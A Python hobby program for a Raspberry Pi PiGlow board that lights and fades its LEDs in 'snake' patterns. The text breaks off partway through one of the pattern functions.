cc8b8f175556606eab470de9096bdeb49fbb87c6 | 103,915 | py | Python | Programs/random_snakes.py | ShineTop/PiGlow | 3b87aca3a36a9cc2076ccebdccc5eb7a61855aa7 | [
"MIT"
] | 5 | 2018-03-16T19:09:50.000Z | 2022-02-06T21:37:35.000Z | Programs/random_snakes.py | Breakfast-for-Pigeons/PiGlow | 3b87aca3a36a9cc2076ccebdccc5eb7a61855aa7 | [
"MIT"
] | 3 | 2018-10-02T16:06:19.000Z | 2020-03-01T19:07:31.000Z | Programs/random_snakes.py | ShineTop/PiGlow | 3b87aca3a36a9cc2076ccebdccc5eb7a61855aa7 | [
"MIT"
] | 1 | 2017-11-03T13:36:35.000Z | 2017-11-03T13:36:35.000Z | #!/usr/bin/env python3
"""
Random Snakes
This program chooses a random snake function.
....................
Functions:
- snake_12: Lights up the LEDs on arms 1 and 2
- snake_13: Lights up the LEDs on arms 1 and 3
- snake_23: Lights up the LEDs on arms 2 and 3
- fading_snake_12: Lights up the LEDs on arms 1 and 2 and fades them
- fading_snake_13: Lights up the LEDs on arms 1 and 3 and fades them
- fading_snake_23: Lights up the LEDs on arms 2 and 3 and fades them
- slithering_snake_12: Lights up then turns off the LEDs on arms 1 and 2
- slithering_snake_13: Lights up then turns off the LEDs on arms 1 and 3
- slithering_snake_21: Lights up then turns off the LEDs on arms 2 and 1
- slithering_snake_23: Lights up then turns off the LEDs on arms 2 and 3
- slithering_snake_31: Lights up then turns off the LEDs on arms 3 and 1
- slithering_snake_32: Lights up then turns off the LEDs on arms 3 and 2
- slithering_fading_snake_12: Lights up then fades the LEDs on arms 1 and 2
- slithering_fading_snake_13: Lights up then fades the LEDs on arms 1 and 3
- slithering_fading_snake_21: Lights up then fades the LEDs on arms 2 and 1
- slithering_fading_snake_23: Lights up then fades the LEDs on arms 2 and 3
- slithering_fading_snake_31: Lights up then turns off the LEDs on arms 3 and 1
- slithering_fading_snake_32: Lights up then turns off the LEDs on arms 3 and 2
- pulsing_snake_12: Lights up and pulses the LEDs on arms 1 and 2
- pulsing_snake_13: Lights up and pulses the LEDs on arms 1 and 3
- pulsing_snake_23: Lights up and pulses the LEDs on arms 2 and 3
- explode_snake_12_or_21: Lights up and turns off the LEDs on arms 1 and 2
- explode_snake_13_or_31: Lights up and turns off the LEDs on arms 1 and 3
- explode_snake_23_or_32: Lights up and turns off the LEDs on arms 2 and 3
- slithering_fizzling_fading_snake_12: Lights up the LEDs on arms 1 and 2
- slithering_fizzling_fading_snake_13: Lights up the LEDs on arms 1 and 3
- slithering_fizzling_fading_snake_21: Lights up the LEDs on arms 2 and 1
- slithering_fizzling_fading_snake_23: Lights up the LEDs on arms 2 and 3
- slithering_fizzling_fading_snake_31: Lights up the LEDs on arms 3 and 1
- slithering_fizzling_fading_snake_32: Lights up the LEDs on arms 3 and 2
- fizzling_snake_12_or_21: Fades the LEDs on arms 1 and 2
- fizzling_snake_13_or_31: Fades the LEDs on arms 1 and 3
- fizzling_snake_23_or_32: Fades the LEDs on arms 2 and 3
....................
Requirements:
PyGlow.py (many thanks to benleb for this program)
bfp_piglow_modules.py
You will have these files if you downloaded the entire repository.
....................
Author: Paul Ryan
This program was written on a Raspberry Pi using the Geany IDE.
"""
########################################################################
# Import modules #
########################################################################
import random
import logging
from time import sleep
from PyGlow import PyGlow
from bfp_piglow_modules import print_header
from bfp_piglow_modules import check_log_directory
from bfp_piglow_modules import delete_empty_logs
from bfp_piglow_modules import stop
########################################################################
# Initialize #
########################################################################
PYGLOW = PyGlow()
PYGLOW.all(0)
########################################################################
# Lists #
########################################################################
# Snake 12 LEDs
SNAKE_12_LEDS = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 18]
# Snake 13 LEDs
SNAKE_13_LEDS = [1, 2, 3, 4, 5, 12, 13, 14, 15, 16, 17, 18]
# Snake 23 LEDs
SNAKE_23_LEDS = [6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17]
########################################################################
# Functions #
########################################################################
def snake_12():
"""
Lights up the LEDs on arms 1 and 2
"""
LOGGER.debug("SNAKE 12")
PYGLOW.set_leds(SNAKE_12_LEDS, 100)
PYGLOW.update_leds()
sleep(2)
PYGLOW.set_leds(SNAKE_12_LEDS, 0)
PYGLOW.update_leds()
def snake_13():
"""
Lights up the LEDs on arms 1 and 3
"""
LOGGER.debug("SNAKE 13")
PYGLOW.set_leds(SNAKE_13_LEDS, 100)
PYGLOW.update_leds()
sleep(2)
PYGLOW.set_leds(SNAKE_13_LEDS, 0)
PYGLOW.update_leds()
def snake_23():
"""
Lights up the LEDs on arms 2 and 3
"""
LOGGER.debug("SNAKE 23")
PYGLOW.set_leds(SNAKE_23_LEDS, 100)
PYGLOW.update_leds()
sleep(2)
PYGLOW.set_leds(SNAKE_23_LEDS, 0)
PYGLOW.update_leds()
def fading_snake_12():
"""
Lights up the LEDs on arms 1 and 2 and fades them
"""
LOGGER.debug("FADING SNAKE 12")
PYGLOW.set_leds(SNAKE_12_LEDS, 100)
PYGLOW.update_leds()
sleep(0.1)
PYGLOW.set_leds(SNAKE_12_LEDS, 90)
PYGLOW.update_leds()
sleep(0.1)
PYGLOW.set_leds(SNAKE_12_LEDS, 80)
PYGLOW.update_leds()
sleep(0.1)
PYGLOW.set_leds(SNAKE_12_LEDS, 70)
PYGLOW.update_leds()
sleep(0.1)
PYGLOW.set_leds(SNAKE_12_LEDS, 60)
PYGLOW.update_leds()
sleep(0.1)
PYGLOW.set_leds(SNAKE_12_LEDS, 50)
PYGLOW.update_leds()
sleep(0.1)
PYGLOW.set_leds(SNAKE_12_LEDS, 40)
PYGLOW.update_leds()
sleep(0.1)
PYGLOW.set_leds(SNAKE_12_LEDS, 30)
PYGLOW.update_leds()
sleep(0.1)
PYGLOW.set_leds(SNAKE_12_LEDS, 20)
PYGLOW.update_leds()
sleep(0.1)
PYGLOW.set_leds(SNAKE_12_LEDS, 10)
PYGLOW.update_leds()
sleep(0.1)
PYGLOW.set_leds(SNAKE_12_LEDS, 0)
PYGLOW.update_leds()
def fading_snake_13():
"""
Lights up the LEDs on arms 1 and 3 and fades them
"""
LOGGER.debug("FADING SNAKE 13")
PYGLOW.set_leds(SNAKE_13_LEDS, 100)
PYGLOW.update_leds()
sleep(0.1)
PYGLOW.set_leds(SNAKE_13_LEDS, 90)
PYGLOW.update_leds()
sleep(0.1)
PYGLOW.set_leds(SNAKE_13_LEDS, 80)
PYGLOW.update_leds()
sleep(0.1)
PYGLOW.set_leds(SNAKE_13_LEDS, 70)
PYGLOW.update_leds()
sleep(0.1)
PYGLOW.set_leds(SNAKE_13_LEDS, 60)
PYGLOW.update_leds()
sleep(0.1)
PYGLOW.set_leds(SNAKE_13_LEDS, 50)
PYGLOW.update_leds()
sleep(0.1)
PYGLOW.set_leds(SNAKE_13_LEDS, 40)
PYGLOW.update_leds()
sleep(0.1)
PYGLOW.set_leds(SNAKE_13_LEDS, 30)
PYGLOW.update_leds()
sleep(0.1)
PYGLOW.set_leds(SNAKE_13_LEDS, 20)
PYGLOW.update_leds()
sleep(0.1)
PYGLOW.set_leds(SNAKE_13_LEDS, 10)
PYGLOW.update_leds()
sleep(0.1)
PYGLOW.set_leds(SNAKE_13_LEDS, 0)
PYGLOW.update_leds()
def fading_snake_23():
"""
Lights up the LEDs on arms 2 and 3 and fades them
"""
LOGGER.debug("FADING SNAKE 23")
PYGLOW.set_leds(SNAKE_23_LEDS, 100)
PYGLOW.update_leds()
sleep(0.1)
PYGLOW.set_leds(SNAKE_23_LEDS, 90)
PYGLOW.update_leds()
sleep(0.1)
PYGLOW.set_leds(SNAKE_23_LEDS, 80)
PYGLOW.update_leds()
sleep(0.1)
PYGLOW.set_leds(SNAKE_23_LEDS, 70)
PYGLOW.update_leds()
sleep(0.1)
PYGLOW.set_leds(SNAKE_23_LEDS, 60)
PYGLOW.update_leds()
sleep(0.1)
PYGLOW.set_leds(SNAKE_23_LEDS, 50)
PYGLOW.update_leds()
sleep(0.1)
PYGLOW.set_leds(SNAKE_23_LEDS, 40)
PYGLOW.update_leds()
sleep(0.1)
PYGLOW.set_leds(SNAKE_23_LEDS, 30)
PYGLOW.update_leds()
sleep(0.1)
PYGLOW.set_leds(SNAKE_23_LEDS, 20)
PYGLOW.update_leds()
sleep(0.1)
PYGLOW.set_leds(SNAKE_23_LEDS, 10)
PYGLOW.update_leds()
sleep(0.1)
PYGLOW.set_leds(SNAKE_23_LEDS, 0)
PYGLOW.update_leds()
def slithering_snake_12():
"""
Lights up then turns off the LEDs on arms 1 and 2
"""
LOGGER.debug("SLITHERING SNAKE 12")
sleep_speed = 0.10
# Light up Snake 12
PYGLOW.led(1, 100)
sleep(sleep_speed)
PYGLOW.led(2, 100)
sleep(sleep_speed)
PYGLOW.led(3, 100)
sleep(sleep_speed)
PYGLOW.led(4, 100)
sleep(sleep_speed)
PYGLOW.led(5, 100)
sleep(sleep_speed)
PYGLOW.led(6, 100)
sleep(sleep_speed)
PYGLOW.led(18, 100)
sleep(sleep_speed)
PYGLOW.led(11, 100)
sleep(sleep_speed)
PYGLOW.led(10, 100)
sleep(sleep_speed)
PYGLOW.led(9, 100)
sleep(sleep_speed)
PYGLOW.led(8, 100)
sleep(sleep_speed)
PYGLOW.led(7, 100)
sleep(sleep_speed)
# Turn off Snake 12
PYGLOW.led(1, 0)
sleep(sleep_speed)
PYGLOW.led(2, 0)
sleep(sleep_speed)
PYGLOW.led(3, 0)
sleep(sleep_speed)
PYGLOW.led(4, 0)
sleep(sleep_speed)
PYGLOW.led(5, 0)
sleep(sleep_speed)
PYGLOW.led(6, 0)
sleep(sleep_speed)
PYGLOW.led(18, 0)
sleep(sleep_speed)
PYGLOW.led(11, 0)
sleep(sleep_speed)
PYGLOW.led(10, 0)
sleep(sleep_speed)
PYGLOW.led(9, 0)
sleep(sleep_speed)
PYGLOW.led(8, 0)
sleep(sleep_speed)
PYGLOW.led(7, 0)
def slithering_snake_13():
"""
Lights up then turns off the LEDs on arms 1 and 3
"""
LOGGER.debug("SLITHERING SNAKE 13")
sleep_speed = 0.10
# Light up Snake 13
PYGLOW.led(1, 100)
sleep(sleep_speed)
PYGLOW.led(2, 100)
sleep(sleep_speed)
PYGLOW.led(3, 100)
sleep(sleep_speed)
PYGLOW.led(4, 100)
sleep(sleep_speed)
PYGLOW.led(5, 100)
sleep(sleep_speed)
PYGLOW.led(12, 100)
sleep(sleep_speed)
PYGLOW.led(18, 100)
sleep(sleep_speed)
PYGLOW.led(17, 100)
sleep(sleep_speed)
PYGLOW.led(16, 100)
sleep(sleep_speed)
PYGLOW.led(15, 100)
sleep(sleep_speed)
PYGLOW.led(14, 100)
sleep(sleep_speed)
PYGLOW.led(13, 100)
sleep(sleep_speed)
# Turn off Snake 13
PYGLOW.led(1, 0)
sleep(sleep_speed)
PYGLOW.led(2, 0)
sleep(sleep_speed)
PYGLOW.led(3, 0)
sleep(sleep_speed)
PYGLOW.led(4, 0)
sleep(sleep_speed)
PYGLOW.led(5, 0)
sleep(sleep_speed)
PYGLOW.led(12, 0)
sleep(sleep_speed)
PYGLOW.led(18, 0)
sleep(sleep_speed)
PYGLOW.led(17, 0)
sleep(sleep_speed)
PYGLOW.led(16, 0)
sleep(sleep_speed)
PYGLOW.led(15, 0)
sleep(sleep_speed)
PYGLOW.led(14, 0)
sleep(sleep_speed)
PYGLOW.led(13, 0)
def slithering_snake_21():
"""
Lights up then turns off the LEDs on arms 2 and 1
"""
LOGGER.debug("SLITHERING SNAKE 21")
sleep_speed = 0.10
# Light up Snake 21
PYGLOW.led(7, 100)
sleep(sleep_speed)
PYGLOW.led(8, 100)
sleep(sleep_speed)
PYGLOW.led(9, 100)
sleep(sleep_speed)
PYGLOW.led(10, 100)
sleep(sleep_speed)
PYGLOW.led(11, 100)
sleep(sleep_speed)
PYGLOW.led(18, 100)
sleep(sleep_speed)
PYGLOW.led(6, 100)
sleep(sleep_speed)
PYGLOW.led(5, 100)
sleep(sleep_speed)
PYGLOW.led(4, 100)
sleep(sleep_speed)
PYGLOW.led(3, 100)
sleep(sleep_speed)
PYGLOW.led(2, 100)
sleep(sleep_speed)
PYGLOW.led(1, 100)
sleep(sleep_speed)
# Turn off Snake 21
PYGLOW.led(7, 0)
sleep(sleep_speed)
PYGLOW.led(8, 0)
sleep(sleep_speed)
PYGLOW.led(9, 0)
sleep(sleep_speed)
PYGLOW.led(10, 0)
sleep(sleep_speed)
PYGLOW.led(11, 0)
sleep(sleep_speed)
PYGLOW.led(18, 0)
sleep(sleep_speed)
PYGLOW.led(6, 0)
sleep(sleep_speed)
PYGLOW.led(5, 0)
sleep(sleep_speed)
PYGLOW.led(4, 0)
sleep(sleep_speed)
PYGLOW.led(3, 0)
sleep(sleep_speed)
PYGLOW.led(2, 0)
sleep(sleep_speed)
PYGLOW.led(1, 0)
def slithering_snake_23():
"""
Lights up then turns off the LEDs on arms 2 and 3
"""
LOGGER.debug("SLITHERING SNAKE 23")
sleep_speed = 0.10
# Light up Snake 23
PYGLOW.led(7, 100)
sleep(sleep_speed)
PYGLOW.led(8, 100)
sleep(sleep_speed)
PYGLOW.led(9, 100)
sleep(sleep_speed)
PYGLOW.led(10, 100)
sleep(sleep_speed)
PYGLOW.led(11, 100)
sleep(sleep_speed)
PYGLOW.led(12, 100)
sleep(sleep_speed)
PYGLOW.led(6, 100)
sleep(sleep_speed)
PYGLOW.led(17, 100)
sleep(sleep_speed)
PYGLOW.led(16, 100)
sleep(sleep_speed)
PYGLOW.led(15, 100)
sleep(sleep_speed)
PYGLOW.led(14, 100)
sleep(sleep_speed)
PYGLOW.led(13, 100)
sleep(sleep_speed)
# Turn off Snake 23
PYGLOW.led(7, 0)
sleep(sleep_speed)
PYGLOW.led(8, 0)
sleep(sleep_speed)
PYGLOW.led(9, 0)
sleep(sleep_speed)
PYGLOW.led(10, 0)
sleep(sleep_speed)
PYGLOW.led(11, 0)
sleep(sleep_speed)
PYGLOW.led(12, 0)
sleep(sleep_speed)
PYGLOW.led(6, 0)
sleep(sleep_speed)
PYGLOW.led(17, 0)
sleep(sleep_speed)
PYGLOW.led(16, 0)
sleep(sleep_speed)
PYGLOW.led(15, 0)
sleep(sleep_speed)
PYGLOW.led(14, 0)
sleep(sleep_speed)
PYGLOW.led(13, 0)
def slithering_snake_31():
"""
Lights up then turns off the LEDs on arms 3 and 1
"""
LOGGER.debug("SLITHERING SNAKE 31")
sleep_speed = 0.10
# Light up Snake 31
PYGLOW.led(13, 100)
sleep(sleep_speed)
PYGLOW.led(14, 100)
sleep(sleep_speed)
PYGLOW.led(15, 100)
sleep(sleep_speed)
PYGLOW.led(16, 100)
sleep(sleep_speed)
PYGLOW.led(17, 100)
sleep(sleep_speed)
PYGLOW.led(18, 100)
sleep(sleep_speed)
PYGLOW.led(12, 100)
sleep(sleep_speed)
PYGLOW.led(5, 100)
sleep(sleep_speed)
PYGLOW.led(4, 100)
sleep(sleep_speed)
PYGLOW.led(3, 100)
sleep(sleep_speed)
PYGLOW.led(2, 100)
sleep(sleep_speed)
PYGLOW.led(1, 100)
sleep(sleep_speed)
# Turn off Snake 31
PYGLOW.led(13, 0)
sleep(sleep_speed)
PYGLOW.led(14, 0)
sleep(sleep_speed)
PYGLOW.led(15, 0)
sleep(sleep_speed)
PYGLOW.led(16, 0)
sleep(sleep_speed)
PYGLOW.led(17, 0)
sleep(sleep_speed)
PYGLOW.led(18, 0)
sleep(sleep_speed)
PYGLOW.led(12, 0)
sleep(sleep_speed)
PYGLOW.led(5, 0)
sleep(sleep_speed)
PYGLOW.led(4, 0)
sleep(sleep_speed)
PYGLOW.led(3, 0)
sleep(sleep_speed)
PYGLOW.led(2, 0)
sleep(sleep_speed)
PYGLOW.led(1, 0)
def slithering_snake_32():
"""
Lights up then turns off the LEDs on arms 3 and 2
"""
LOGGER.debug("SLITHERING SNAKE 32")
sleep_speed = 0.10
# Light up Snake 32
PYGLOW.led(13, 100)
sleep(sleep_speed)
PYGLOW.led(14, 100)
sleep(sleep_speed)
PYGLOW.led(15, 100)
sleep(sleep_speed)
PYGLOW.led(16, 100)
sleep(sleep_speed)
PYGLOW.led(17, 100)
sleep(sleep_speed)
PYGLOW.led(6, 100)
sleep(sleep_speed)
PYGLOW.led(12, 100)
sleep(sleep_speed)
PYGLOW.led(11, 100)
sleep(sleep_speed)
PYGLOW.led(10, 100)
sleep(sleep_speed)
PYGLOW.led(9, 100)
sleep(sleep_speed)
PYGLOW.led(8, 100)
sleep(sleep_speed)
PYGLOW.led(7, 100)
sleep(sleep_speed)
# Turn off Snake 32
PYGLOW.led(13, 0)
sleep(sleep_speed)
PYGLOW.led(14, 0)
sleep(sleep_speed)
PYGLOW.led(15, 0)
sleep(sleep_speed)
PYGLOW.led(16, 0)
sleep(sleep_speed)
PYGLOW.led(17, 0)
sleep(sleep_speed)
PYGLOW.led(6, 0)
sleep(sleep_speed)
PYGLOW.led(12, 0)
sleep(sleep_speed)
PYGLOW.led(11, 0)
sleep(sleep_speed)
PYGLOW.led(10, 0)
sleep(sleep_speed)
PYGLOW.led(9, 0)
sleep(sleep_speed)
PYGLOW.led(8, 0)
sleep(sleep_speed)
PYGLOW.led(7, 0)
def slithering_fading_snake_12():
"""
Lights up then fades the LEDs on arms 1 and 2
"""
LOGGER.debug("SLITHERING FADING SNAKE 12")
sleep_speed = 0.01
# Turn on Snake Head
PYGLOW.led(1, 120)
sleep(sleep_speed)
# Turn on Snake Body 1
PYGLOW.led(2, 120)
sleep(sleep_speed)
# Fade Head
PYGLOW.led(1, 110)
sleep(sleep_speed)
# Turn on Snake Body 2
PYGLOW.led(3, 120)
sleep(sleep_speed)
# Fade Head and Body 1
PYGLOW.led(1, 100)
sleep(sleep_speed)
PYGLOW.led(2, 110)
sleep(sleep_speed)
# Turn on Snake Body 3
PYGLOW.led(4, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 2
PYGLOW.led(1, 90)
sleep(sleep_speed)
PYGLOW.led(2, 100)
sleep(sleep_speed)
PYGLOW.led(3, 110)
sleep(sleep_speed)
# Turn on Snake Body 4
PYGLOW.led(5, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 3
PYGLOW.led(1, 80)
sleep(sleep_speed)
PYGLOW.led(2, 90)
sleep(sleep_speed)
PYGLOW.led(3, 100)
sleep(sleep_speed)
PYGLOW.led(4, 110)
sleep(sleep_speed)
# Turn on Snake Body 5
PYGLOW.led(6, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 4
PYGLOW.led(1, 70)
sleep(sleep_speed)
PYGLOW.led(2, 80)
sleep(sleep_speed)
PYGLOW.led(3, 90)
sleep(sleep_speed)
PYGLOW.led(4, 100)
sleep(sleep_speed)
PYGLOW.led(5, 110)
sleep(sleep_speed)
# Turn on Snake Body 6
PYGLOW.led(18, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 5
PYGLOW.led(1, 60)
sleep(sleep_speed)
PYGLOW.led(2, 70)
sleep(sleep_speed)
PYGLOW.led(3, 80)
sleep(sleep_speed)
PYGLOW.led(4, 90)
sleep(sleep_speed)
PYGLOW.led(5, 100)
sleep(sleep_speed)
PYGLOW.led(6, 110)
sleep(sleep_speed)
# Turn on Snake Body 7
PYGLOW.led(11, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 6
PYGLOW.led(1, 50)
sleep(sleep_speed)
PYGLOW.led(2, 60)
sleep(sleep_speed)
PYGLOW.led(3, 70)
sleep(sleep_speed)
PYGLOW.led(4, 80)
sleep(sleep_speed)
PYGLOW.led(5, 90)
sleep(sleep_speed)
PYGLOW.led(6, 100)
sleep(sleep_speed)
PYGLOW.led(18, 110)
sleep(sleep_speed)
# Turn on Snake Body 8
PYGLOW.led(10, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 7
PYGLOW.led(1, 40)
sleep(sleep_speed)
PYGLOW.led(2, 50)
sleep(sleep_speed)
PYGLOW.led(3, 60)
sleep(sleep_speed)
PYGLOW.led(4, 70)
sleep(sleep_speed)
PYGLOW.led(5, 80)
sleep(sleep_speed)
PYGLOW.led(6, 90)
sleep(sleep_speed)
PYGLOW.led(18, 100)
sleep(sleep_speed)
PYGLOW.led(11, 110)
sleep(sleep_speed)
# Turn on Snake Body 9
PYGLOW.led(9, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 8
PYGLOW.led(1, 30)
sleep(sleep_speed)
PYGLOW.led(2, 40)
sleep(sleep_speed)
PYGLOW.led(3, 50)
sleep(sleep_speed)
PYGLOW.led(4, 60)
sleep(sleep_speed)
PYGLOW.led(5, 70)
sleep(sleep_speed)
PYGLOW.led(6, 80)
sleep(sleep_speed)
PYGLOW.led(18, 90)
sleep(sleep_speed)
PYGLOW.led(11, 100)
sleep(sleep_speed)
PYGLOW.led(10, 110)
sleep(sleep_speed)
# Turn on Snake Body 10
PYGLOW.led(8, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 9
PYGLOW.led(1, 20)
sleep(sleep_speed)
PYGLOW.led(2, 30)
sleep(sleep_speed)
PYGLOW.led(3, 40)
sleep(sleep_speed)
PYGLOW.led(4, 50)
sleep(sleep_speed)
PYGLOW.led(5, 60)
sleep(sleep_speed)
PYGLOW.led(6, 70)
sleep(sleep_speed)
PYGLOW.led(18, 80)
sleep(sleep_speed)
PYGLOW.led(11, 90)
sleep(sleep_speed)
PYGLOW.led(10, 100)
sleep(sleep_speed)
PYGLOW.led(9, 110)
sleep(sleep_speed)
# Turn on Snake Tail
PYGLOW.led(7, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 10
PYGLOW.led(1, 10)
sleep(sleep_speed)
PYGLOW.led(2, 20)
sleep(sleep_speed)
PYGLOW.led(3, 30)
sleep(sleep_speed)
PYGLOW.led(4, 40)
sleep(sleep_speed)
PYGLOW.led(5, 50)
sleep(sleep_speed)
PYGLOW.led(6, 60)
sleep(sleep_speed)
PYGLOW.led(18, 70)
sleep(sleep_speed)
PYGLOW.led(11, 80)
sleep(sleep_speed)
PYGLOW.led(10, 90)
sleep(sleep_speed)
PYGLOW.led(9, 100)
sleep(sleep_speed)
PYGLOW.led(8, 110)
sleep(sleep_speed)
# Fade Head, Body 1 - 10, and Tail
PYGLOW.led(1, 0)
sleep(sleep_speed)
PYGLOW.led(2, 10)
sleep(sleep_speed)
PYGLOW.led(3, 20)
sleep(sleep_speed)
PYGLOW.led(4, 30)
sleep(sleep_speed)
PYGLOW.led(5, 40)
sleep(sleep_speed)
PYGLOW.led(6, 50)
sleep(sleep_speed)
PYGLOW.led(18, 60)
sleep(sleep_speed)
PYGLOW.led(11, 70)
sleep(sleep_speed)
PYGLOW.led(10, 80)
sleep(sleep_speed)
PYGLOW.led(9, 90)
sleep(sleep_speed)
PYGLOW.led(8, 100)
sleep(sleep_speed)
PYGLOW.led(7, 110)
sleep(sleep_speed)
# Fade Body 1 - 10 and Tail
PYGLOW.led(2, 0)
sleep(sleep_speed)
PYGLOW.led(3, 10)
sleep(sleep_speed)
PYGLOW.led(4, 20)
sleep(sleep_speed)
PYGLOW.led(5, 30)
sleep(sleep_speed)
PYGLOW.led(6, 40)
sleep(sleep_speed)
PYGLOW.led(18, 50)
sleep(sleep_speed)
PYGLOW.led(11, 60)
sleep(sleep_speed)
PYGLOW.led(10, 70)
sleep(sleep_speed)
PYGLOW.led(9, 80)
sleep(sleep_speed)
PYGLOW.led(8, 90)
sleep(sleep_speed)
PYGLOW.led(7, 100)
sleep(sleep_speed)
# Fade Body 2 - 10 and Tail
PYGLOW.led(3, 0)
sleep(sleep_speed)
PYGLOW.led(4, 10)
sleep(sleep_speed)
PYGLOW.led(5, 20)
sleep(sleep_speed)
PYGLOW.led(6, 30)
sleep(sleep_speed)
PYGLOW.led(18, 40)
sleep(sleep_speed)
PYGLOW.led(11, 50)
sleep(sleep_speed)
PYGLOW.led(10, 60)
sleep(sleep_speed)
PYGLOW.led(9, 70)
sleep(sleep_speed)
PYGLOW.led(8, 80)
sleep(sleep_speed)
PYGLOW.led(7, 90)
sleep(sleep_speed)
# Fade Body 3 - 10 and Tail
PYGLOW.led(4, 0)
sleep(sleep_speed)
PYGLOW.led(5, 10)
sleep(sleep_speed)
PYGLOW.led(6, 20)
sleep(sleep_speed)
PYGLOW.led(18, 30)
sleep(sleep_speed)
PYGLOW.led(11, 40)
sleep(sleep_speed)
PYGLOW.led(10, 50)
sleep(sleep_speed)
PYGLOW.led(9, 60)
sleep(sleep_speed)
PYGLOW.led(8, 70)
sleep(sleep_speed)
PYGLOW.led(7, 80)
sleep(sleep_speed)
# Fade Body 4 - 10 and Tail
PYGLOW.led(5, 0)
sleep(sleep_speed)
PYGLOW.led(6, 10)
sleep(sleep_speed)
PYGLOW.led(18, 20)
sleep(sleep_speed)
PYGLOW.led(11, 30)
sleep(sleep_speed)
PYGLOW.led(10, 40)
sleep(sleep_speed)
PYGLOW.led(9, 50)
sleep(sleep_speed)
PYGLOW.led(8, 60)
sleep(sleep_speed)
PYGLOW.led(7, 70)
sleep(sleep_speed)
# Fade Body 5 - 10 and Tail
PYGLOW.led(6, 0)
sleep(sleep_speed)
PYGLOW.led(18, 10)
sleep(sleep_speed)
PYGLOW.led(11, 20)
sleep(sleep_speed)
PYGLOW.led(10, 30)
sleep(sleep_speed)
PYGLOW.led(9, 40)
sleep(sleep_speed)
PYGLOW.led(8, 50)
sleep(sleep_speed)
PYGLOW.led(7, 60)
sleep(sleep_speed)
# Fade Body 6 - 10 and Tail
PYGLOW.led(18, 0)
sleep(sleep_speed)
PYGLOW.led(11, 10)
sleep(sleep_speed)
PYGLOW.led(10, 20)
sleep(sleep_speed)
PYGLOW.led(9, 30)
sleep(sleep_speed)
PYGLOW.led(8, 40)
sleep(sleep_speed)
PYGLOW.led(7, 50)
sleep(sleep_speed)
# Fade Body 7 - 10 and Tail
PYGLOW.led(11, 0)
sleep(sleep_speed)
PYGLOW.led(10, 10)
sleep(sleep_speed)
PYGLOW.led(9, 20)
sleep(sleep_speed)
PYGLOW.led(8, 30)
sleep(sleep_speed)
PYGLOW.led(7, 40)
sleep(sleep_speed)
# Fade Body 8 - 10 and Tail
PYGLOW.led(10, 0)
sleep(sleep_speed)
PYGLOW.led(9, 10)
sleep(sleep_speed)
PYGLOW.led(8, 20)
sleep(sleep_speed)
PYGLOW.led(7, 30)
sleep(sleep_speed)
# Fade Body 9 - 10 and Tail
PYGLOW.led(9, 0)
sleep(sleep_speed)
PYGLOW.led(8, 10)
sleep(sleep_speed)
PYGLOW.led(7, 20)
sleep(sleep_speed)
# Fade Body 10 and Tail
PYGLOW.led(8, 0)
sleep(sleep_speed)
PYGLOW.led(7, 10)
sleep(sleep_speed)
# Fade Tail
PYGLOW.led(7, 0)
sleep(sleep_speed)
def slithering_fading_snake_13():
"""
Lights up then fades the LEDs on arms 1 and 3
"""
LOGGER.debug("SLITHERING FADING SNAKE 13")
sleep_speed = 0.01
# Turn on Snake Head
PYGLOW.led(1, 120)
sleep(sleep_speed)
# Turn on Snake Body 1
PYGLOW.led(2, 120)
sleep(sleep_speed)
# Fade Head
PYGLOW.led(1, 110)
sleep(sleep_speed)
# Turn on Snake Body 2
PYGLOW.led(3, 120)
sleep(sleep_speed)
# Fade Head and Body 1
PYGLOW.led(1, 100)
sleep(sleep_speed)
PYGLOW.led(2, 110)
sleep(sleep_speed)
# Turn on Snake Body 3
PYGLOW.led(4, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 2
PYGLOW.led(1, 90)
sleep(sleep_speed)
PYGLOW.led(2, 100)
sleep(sleep_speed)
PYGLOW.led(3, 110)
sleep(sleep_speed)
# Turn on Snake Body 4
PYGLOW.led(5, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 3
PYGLOW.led(1, 80)
sleep(sleep_speed)
PYGLOW.led(2, 90)
sleep(sleep_speed)
PYGLOW.led(3, 80)
sleep(sleep_speed)
PYGLOW.led(4, 110)
sleep(sleep_speed)
# Turn on Snake Body 5
PYGLOW.led(12, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 4
PYGLOW.led(1, 70)
sleep(sleep_speed)
PYGLOW.led(2, 80)
sleep(sleep_speed)
PYGLOW.led(3, 90)
sleep(sleep_speed)
PYGLOW.led(4, 100)
sleep(sleep_speed)
PYGLOW.led(5, 110)
sleep(sleep_speed)
# Turn on Snake Body 6
PYGLOW.led(18, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 5
PYGLOW.led(1, 60)
sleep(sleep_speed)
PYGLOW.led(2, 70)
sleep(sleep_speed)
PYGLOW.led(3, 80)
sleep(sleep_speed)
PYGLOW.led(4, 90)
sleep(sleep_speed)
PYGLOW.led(5, 100)
sleep(sleep_speed)
PYGLOW.led(12, 110)
sleep(sleep_speed)
# Turn on Snake Body 7
PYGLOW.led(17, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 6
PYGLOW.led(1, 50)
sleep(sleep_speed)
PYGLOW.led(2, 60)
sleep(sleep_speed)
PYGLOW.led(3, 70)
sleep(sleep_speed)
PYGLOW.led(4, 80)
sleep(sleep_speed)
PYGLOW.led(5, 90)
sleep(sleep_speed)
PYGLOW.led(12, 100)
sleep(sleep_speed)
PYGLOW.led(18, 110)
sleep(sleep_speed)
# Turn on Snake Body 8
PYGLOW.led(16, 120)
sleep(sleep_speed)
# Fade Head and Body 1 - 7
PYGLOW.led(1, 40)
sleep(sleep_speed)
PYGLOW.led(2, 50)
sleep(sleep_speed)
PYGLOW.led(3, 60)
sleep(sleep_speed)
PYGLOW.led(4, 70)
sleep(sleep_speed)
PYGLOW.led(5, 80)
sleep(sleep_speed)
PYGLOW.led(12, 90)
sleep(sleep_speed)
PYGLOW.led(18, 100)
sleep(sleep_speed)
PYGLOW.led(17, 110)
